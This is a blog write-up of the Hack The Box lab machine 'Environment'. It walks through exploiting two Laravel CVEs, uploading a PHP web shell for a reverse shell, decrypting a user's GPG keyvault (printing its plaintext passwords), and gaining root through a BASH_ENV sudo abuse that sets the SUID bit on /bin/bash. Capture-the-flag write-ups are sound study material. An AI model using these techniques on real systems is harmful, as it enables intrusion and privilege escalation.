Hackthebox: Environment

Foued SAIDI Lv4
  2025-09-06 14:32:41 2025-09-06 14:32:41 Created   2025-09-06 15:01:05 2025-09-06 15:01:05 Updated    

Overview

Environment is a medium-difficulty machine from Hack The Box dealing initially with a broken Laravel PHP application that mishandles errors allowing us to uncover a hidden endpoint vulnerable to CVE-2024-52301 to then exploit a file upload vulnerability + CVE-2024-21546 to get a shell on system. Then sone gnupg keyvault abuse to exfiltrate credentials and eventually abuse systeminfo binary to get root access.

Environment-info-card
Environment-info-card

Reconnaissance

1
2
3
4
5
6
7
8
9
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey:
|   256 5c:02:33:95:ef:44:e2:80:cd:3a:96:02:23:f1:92:64 (ECDSA)
|_  256 1f:3d:c2:19:55:28:a1:77:59:51:48:10:c4:4b:74:ab (ED25519)
80/tcp open  http    nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Did not follow redirect to http://environment.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nothing too interesting here, ssh is exposed through port 22 and we have a web application deployed on port 80 that’s redirecting us to environment.htb so we’ll add that entry to our /etc/hosts file.

Web Application - http://environment.htb

Wappalyzer
Wappalyzer

We can see from the wappalyzer tab that the web app is using laravel.
Making a simple authentication request and messing with the parameter to see if we can trigger some sort of error:

Authentication
Authentication

We can actually see some triggered error. Specifically that $keep_loggedin !== False doesnt have any logic. so let’s supply a randon value to the rememberme field and see what new error we’ll get:

Authentication
Authentication

Here we can see that We can access management through preprod.
Checking for related security vulnerabilities, we find CVE-2024-52301 which allows us to directly submit a preprod environment variable to directly access preprod environment:

Preprod
Preprod

And we can indeed:

Preprod
Preprod

Preprod
Preprod

Now doing some enumeration on it we find a info endpoint:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
PS C:\Users\0xkujen\Desktop\Tools> feroxbuster -u http://environment.htb/management/ -w .\SecLists-master\Discovery\Web-Content\common.txt -C 404,403

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher πŸ€“                 ver: 2.8.0
───────────────────────────┬──────────────────────
 🎯  Target Url            β”‚ http://environment.htb/management/
 πŸš€  Threads               β”‚ 50
 πŸ“–  Wordlist              β”‚ .\SecLists-master\Discovery\Web-Content\common.txt
 πŸ’’  Status Code Filters   β”‚ [404, 403]
 πŸ’₯  Timeout (secs)        β”‚ 7
 🦑  User-Agent            β”‚ feroxbuster/2.8.0
 🏁  HTTP methods          β”‚ [GET]
 πŸ”ƒ  Recursion Depth       β”‚ 4
 πŸŽ‰  New Version Available β”‚ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menuβ„’
──────────────────────────────────────────────────
WLD        -         -         -         - http://environment.htb/management/.git/logs/ => auto-filtering 404-like response (153 bytes); toggle this behavior by using --dont-filter
302      GET       12l       22w      358c http://environment.htb/management/dashboard => http://environment.htb/login
302      GET       12l       22w      358c http://environment.htb/management/info => http://environment.htb/login
302      GET       12l       22w      358c http://environment.htb/management/profile => http://environment.htb/login
[####################] - 2m     14241/14241   0s      found:3       errors:0
[####################] - 2m      4751/4747    37/s    http://environment.htb/management/
[####################] - 1m      4751/4747    40/s    http://environment.htb/management/.git/logs/
[####################] - 1m      4751/4747    47/s    http://environment.htb/management/.git/logs/cgi-bin/

This will leak us the php info page, but not so useful now.

Checking other features, we find that we can upload an avatar picture. That leverages the unisharp/laravel-filemanager package which in this case is vulnerable to CVE-2024-21546 where we can:
1- upload shell.php
2- (now on the request):
2.1 change its name to shell.php.
2.2 add GIF8 at the beginning
2.3 and boom we will get our shell back.

1
2
3
4
5
6
7
8
9
10
11
PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.31] from (UNKNOWN) [10.10.11.67] 48460
Linux environment 6.1.0-34-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.135-1 (2025-04-25) x86_64 GNU/Linux
 03:51:28 up 23:50,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

Looking at the user’s home folder, we find some interesting keyvault file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ ls -al
total 12
drwxr-xr-x 2 hish hish 4096 Jan 12 11:49 .
drwxr-xr-x 5 hish hish 4096 Apr 11 00:51 ..
-rw-r--r-- 1 hish hish  430 May 15 03:54 keyvault.gpg
$ ls -al ..
total 36
drwxr-xr-x 5 hish hish 4096 Apr 11 00:51 .
drwxr-xr-x 3 root root 4096 Jan 12 11:51 ..
lrwxrwxrwx 1 root root    9 Apr  7 19:29 .bash_history -> /dev/null
-rw-r--r-- 1 hish hish  220 Jan  6 21:28 .bash_logout
-rw-r--r-- 1 hish hish 3526 Jan 12 14:42 .bashrc
drwxr-xr-x 4 hish hish 4096 May 15 03:54 .gnupg
drwxr-xr-x 3 hish hish 4096 Jan  6 21:43 .local
-rw-r--r-- 1 hish hish  807 Jan  6 21:28 .profile
drwxr-xr-x 2 hish hish 4096 Jan 12 11:49 backup
-rw-r--r-- 1 root hish   33 May 14 04:03 user.txt
$

That we can decrypt using the contents of the .gnupg folder:

1
2
3
4
5
6
7
8
9
10
11
12
$ cp -R /home/hish/.gnupg .
$ cp /home/hish/backup/keyvault.gpg
cp: missing destination file operand after '/home/hish/backup/keyvault.gpg'
Try 'cp --help' for more information.
$ cp /home/hish/backup/keyvault.gpg .
$ GNUPGHOME=/tmp/.gnupg gpg --decrypt keyvault.gpg
gpg: encrypted with 2048-bit RSA key, ID B755B0EDD6CFCFD3, created 2025-01-11
      "hish_ <[email protected]>"
PAYPAL.COM -> Ihaves0meMon$yhere123
ENVIRONMENT.HTB -> marineSPm@ster!!
FACEBOOK.COM -> summerSunnyB3ACH!!
$

We can now ssh to hish with the environment password and get our user flag.

Privilege Escalation - systeminfo abuse

Looking at what hish user can execute as root:

1
2
3
4
5
6
7
8
hish@environment:~$ sudo -l
[sudo] password for hish:
Matching Defaults entries for hish on environment:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    env_keep+="ENV BASH_ENV", use_pty

User hish may run the following commands on environment:
    (ALL) /usr/bin/systeminfo

A simple abuse is to first create a shell file:

1
2
#!/bin/bash 
chmod +s /bin/bash

And then we can update the BASH_ENV environment variable and get root access via this command:

1
sudo BASH_ENV=/tmp/shell /usr/bin/systeminfo

Then just type bash -p and you’ll find yourself on a root shell :)

That was it for Environment, happy hacking!
-0xkujen

  • Title: Hackthebox: Environment
  • Author: Foued SAIDI
  • Created at : 2025-09-06 14:32:41
  • Updated at : 2025-09-06 15:01:05
  • Link: https://kujen5.github.io/2025/09/06/Hackthebox-Environment/
  • License: This work is licensed under CC BY-NC-SA 4.0.
On this page
Hackthebox: Environment
  1. Overview
  2. Reconnaissance
  3. Web Application - http://environment.htb
  4. Privilege Escalation - systeminfo abuse